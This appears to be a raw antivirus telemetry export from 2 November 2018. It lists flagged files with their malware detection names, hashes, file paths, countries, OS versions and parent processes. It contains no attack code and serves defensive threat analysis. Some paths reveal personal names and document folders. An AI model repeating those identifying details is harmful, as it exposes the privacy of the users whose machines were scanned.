  Row(detection=Row(filename='avscan-20181102-104446-0627f346', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104446-0627F346', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:44:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105023-26c3fad7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105023-26C3FAD7', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-051114-d358a1b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6122e679\\AVSCAN-20181103-044944-1F899F70\\AVSCAN-20181103-051114-D358A1B6', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105512-42b7ed8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105512-42B7ED8C', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105536-4505b858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105536-4505B858', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104934-22002a9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104934-22002A9C', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105256-3592c383', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105256-3592C383', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104800-18e29610', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104800-18E29610', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104838-1c981a2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104838-1C981A2E', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104235-f97bf6ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104235-F97BF6EA', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:42:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104635-10b1ce1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104635-10B1CE1B', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104657-12cc5805', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104657-12CC5805', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T01:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=1518968, timestamp='2018-11-02T08:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T02:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D88B04B4BC6AE15EF14B0E49C9B9673E3696FFC344533066BBE116EE15FFC48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d88b04b4bc6ae15ef14b0e49c9b9673e3696ffc344533066bbe116ee15ffc48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\BAWTOKCVHE\\uninstaller.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R4133'), hash='1d897e351edd5f44a82441ad9231b346585178ee906f26056b28d8e195b561f9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174227-21c2e92a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2853152\\AVSCAN-20181102-173838-009AC5C4\\AVSCAN-20181102-174227-21C2E92A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174624-44468b9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2853152\\AVSCAN-20181102-173838-009AC5C4\\AVSCAN-20181102-174624-44468B9A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patchmeup.exe', filepath='D:\\transit\\e-SPT\\Aplikasi e-SPT pph 21 versi 2.1  th.2014\\2. installer update espt 21 ver 2.1 ( jan2014)\\patchmeup.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='1dc9749daa80d83143d41d832dc9f057873eb96bbaaf3d17eb2d9a6b0cd48b4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='e:\\users\\X\\desktop\\megared gml\\windows\\system32\\dllcache\\wmplayer.exe', filesize=64000, name='TR/Dropper.Gen8.#M300.#R700255'), hash='1dec67dc23c158887f03ec5ec57b9555c9fa7a898da120e732d1cc86534bf15e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Users\\X\\Desktop\\MIGUEL ANGEL\\Users\\Megainfo1\\Desktop\\MEGARED GML\\WINDOWS\\system32\\dllcache\\wmplayer.exe', filesize=64000, name='TR/Dropper.Gen8.#M300.#R700255'), hash='1dec67dc23c158887f03ec5ec57b9555c9fa7a898da120e732d1cc86534bf15e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\PowerDataRecovery\\PowerDataRecovery.exe', parentsize=2514944, timestamp='2018-11-02T09:46:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcribe.v8.21.2.incl.keymaker.and.patch-core.rar', filepath='D:\\Téléchargement\\Transcribe.v8.21.2.Incl.Keymaker.And.Patch-CORE-1\\.tmp\\Transcribe.v8.21.2.Incl.Keymaker.And.Patch-CORE.rar', filesize=1248000, name='TR/Injector.SF.#M1.#R1'), hash='1e12c879885c10c7be341a0146fcccd566099e4fc2f662bbd5964c6879cfc64b', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-02T16:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181813-b08d42ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa291d7d\\AVSCAN-20181102-181318-91AE3F7E\\AVSCAN-20181102-181813-B08D42CE', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:18:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grotty.exe', filepath='C:\\altera\\91sp2\\quartus\\bin\\cygwin\\bin\\grotty.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='1e270e47555965a89f16c71287f37b1bdc3fb17a2c188069aad8ae5271d04a87', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='svchost.exe', filepath='\\?\\c:\\documents and settings\\X\\dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:09:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='svchost.exe', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='1e6b47af63ca010186635f64f9a1278fb1460b97c88500f9980345fc2c5601fc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R+Sn98fajEKZ9QV1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:43:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b1b538ce-9b1e-a095-e78d-a93cdcc3ff42.exe', filepath='F:\\{78911544-95f0-fdef-2e08-6eabacb7eaaa} (2)\\b1b538ce-9b1e-a095-e78d-a93cdcc3ff42.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-02T02:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9a74eb7a-774f-133a-be1b-4104c2aa4dc4.exe', filepath='I:\\{8838958c-4504-1c0f-0f0b-e16bce3325e1}\\9a74eb7a-774f-133a-be1b-4104c2aa4dc4.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T12:51:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055440-bbd7739d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_894768d7\\AVSCAN-20181102-055335-AD1BBB21\\AVSCAN-20181102-055440-BBD7739D', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090425-453e9b5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6e5b42b\\AVSCAN-20181102-090226-3A2AE099\\AVSCAN-20181102-090425-453E9B5E', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:05:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130647-771b62f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00dd1b48\\AVSCAN-20181102-124919-AE3CAC27\\AVSCAN-20181102-130647-771B62F0', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\01.12.2017-163.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1029864\\1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3.MRG', filesize=320000, name='HEUR/AGEN.1029864.#M1.#R1'), hash='1ee6cd3776d8bfa716073fdc143e6e1736375d764749c6d161ce717bd53552f3', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\01.12.2017-26.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T11:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123759-5d0e99f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_15112874\\AVSCAN-20181102-123746-5A66D208\\AVSCAN-20181102-123759-5D0E99F2', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-u -p 1088 -s 720', country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=385672, timestamp='2018-11-02T09:36:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Users\\X\\Dropbox\\KMSPico v4.3\\KMSpico Only Service\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T11:31:17Z'), dt=datetime.date(2018, 11, 2)),
